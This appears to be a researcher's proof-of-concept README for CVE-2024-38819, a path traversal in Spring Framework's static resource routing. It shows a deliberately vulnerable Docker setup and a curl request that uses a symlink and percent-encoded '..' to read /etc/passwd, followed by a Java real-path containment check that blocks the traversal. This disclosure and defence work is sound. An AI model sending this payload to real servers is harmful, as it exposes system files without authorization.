## https://sploitus.com/exploit?id=EC68727D-A4D5-50CD-946F-EB7B151A0B3E
# CVE-2024-38819: Proof of Concept (PoC)
This is a proof of concept for the [CVE-2024-38819](https://spring.io/security/cve-2024-38819) vulnerability, which I reported, demonstrating a path traversal exploit.
## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
```
cd vuln
docker build -t cve-2024-38819-poc .
```
2. Run the container and expose port 8080 to the host machine
```
docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
```
3. Run the following command to execute the PoC and confirm the vulnerability
```
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
```
If the attack is successful, the contents of the `/etc/passwd` file will be displayed.
## Explanation
1. Create `PathTraversalDemoApplication.java` with the following code to set up static file routing using `RouterFunction` and `FileSystemResource`:
```
// Register as a bean so Spring picks up the route; serves /app/static/ at /static/**
@Bean
public RouterFunction<ServerResponse> staticResourceRouter() {
    return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
}
```
2. Add the following command to the Dockerfile to create a symbolic link:
```
RUN ln -s /static /app/static/link
```
3. Create a payload that leverages percent-encoding to traverse directories through the symbolic link.
- Path: `/static/link/%2e%2e/etc/passwd`
4. Use the following `curl` command to execute the PoC and verify if the attack is successful:
```
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
```
If the attack is successful, the contents of the `/etc/passwd` file will be displayed.
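A containment check that rejects the symlink-plus-`%2e%2e` path described above, as an added example (not code from this repository or from Spring Framework). It goes slightly beyond the PoC by contrasting a purely lexical check with a real-path check; the class name, method names and temporary directory layout are assumptions constructed for the demo.

```java
import java.io.IOException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

public class ContainedStaticLookup {

    // Percent-decode a request sub-path ("+" is kept literal) and make it relative.
    static String decode(String rawSubPath) {
        String s = URLDecoder.decode(rawSubPath.replace("+", "%2B"), StandardCharsets.UTF_8);
        return s.replaceFirst("^/+", "");
    }

    // Lexical check only: ".." is collapsed as text, so symlinks are never consulted.
    static boolean lexicallyContained(Path root, String rawSubPath) {
        return root.resolve(decode(rawSubPath)).normalize().startsWith(root);
    }

    // Real-path check: the OS resolves symlinks and ".." in order, then containment is tested.
    static boolean reallyContained(Path root, String rawSubPath) {
        try {
            Path realRoot = root.toRealPath();
            Path real = realRoot.resolve(decode(rawSubPath)).toRealPath();
            return real.startsWith(realRoot) && Files.isRegularFile(real);
        } catch (IOException | IllegalArgumentException e) {
            return false; // missing file, bad escape sequence, or invalid path characters
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout mirroring the page: <tmp>/app/static is the served root,
        // <tmp>/app/static/link -> <tmp>/static, and <tmp>/etc/passwd lies outside the root.
        Path tmp = Files.createTempDirectory("traversal-demo").toRealPath();
        Path root = Files.createDirectories(tmp.resolve("app/static"));
        Files.createDirectories(tmp.resolve("static"));
        Files.createDirectories(tmp.resolve("etc"));
        Files.writeString(tmp.resolve("etc/passwd"), "constructed sample, not a real passwd file\n");
        Files.writeString(root.resolve("index.html"), "ok\n");
        Files.createSymbolicLink(root.resolve("link"), tmp.resolve("static"));

        for (String sub : new String[] {"index.html", "link/%2e%2e/etc/passwd"}) {
            System.out.printf("%-24s lexical=%b realpath=%b%n",
                    sub, lexicallyContained(root, sub), reallyContained(root, sub));
        }
    }
}
```

The real-path check also refuses every file reached through `link`, because the link's target lies outside the served root; that is the intended policy for a static directory that should never follow links out of itself.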
## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.